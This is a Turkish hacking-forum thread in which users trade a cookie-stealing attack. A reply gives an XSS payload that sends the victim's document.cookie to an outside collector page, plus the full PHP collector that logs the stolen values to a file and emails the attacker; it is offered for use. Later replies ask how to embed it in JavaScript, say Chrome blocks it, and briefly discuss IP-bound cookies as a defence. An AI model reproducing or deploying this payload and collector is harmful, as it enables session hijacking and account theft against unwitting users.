Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
XSS İle Cookie Topladığımız Php Script ??
XSS İle Cookie Topladığımız Php Script ??
-
-
<SCRIPT> location.href='http://site.com/ekle.php?c='+escape(document. cookie)</SCRIPT>
Ekle.php kodları:
<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("spymaster@realhackers.net","keklik hazır","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');
?>
-
hocam üstteki kodu bir .js nin içine koysak nasıl koyarız
ayrıca nereye kaydediyor cookileri .txt nin içinden mi alacağım sadece benim dediğim script daha kapsamlıydı siliniyordu cookiler ekleniyordu vs
-
https://www.go4expert.com/articles/stealing-cookie-xss-t17066/
bu işe yarar kaynak sanırım bunu buldum benim gibi bilmeyenler için
-
Chrome yemiyor artık hocam
-
-
tolgasen bunu yazdı
Chrome yemiyor artık hocam
hadi be bu kötü oldu işte
-
-
ben yazdığım özel bi sistemde cookileri ip adresi le şifreliyorum
dolayısıyla unutulan biryerde bilinçsiz bir kullanıcı cookie kaptırsada bi boka yaramıyor
-
-
snnyk bunu yazdı
ben yazdığım özel bi sistemde cookileri ip adresi le şifreliyorum
dolayısıyla unutulan biryerde bilinçsiz bir kullanıcı cookie kaptırsada bi boka yaramıyor
Gizliliğe dayalı güvenlik çok da güvenilir olmaz eğer ki saldırılabilecek bir sistemse. Hangi şifreleme yöntemi kullanıldığı bulunursa, parola olarak da ip adresi denenirse atlatmak zor değil.
Ama tahminimce bi salt değeri falan fazladan birşeyler vardır =)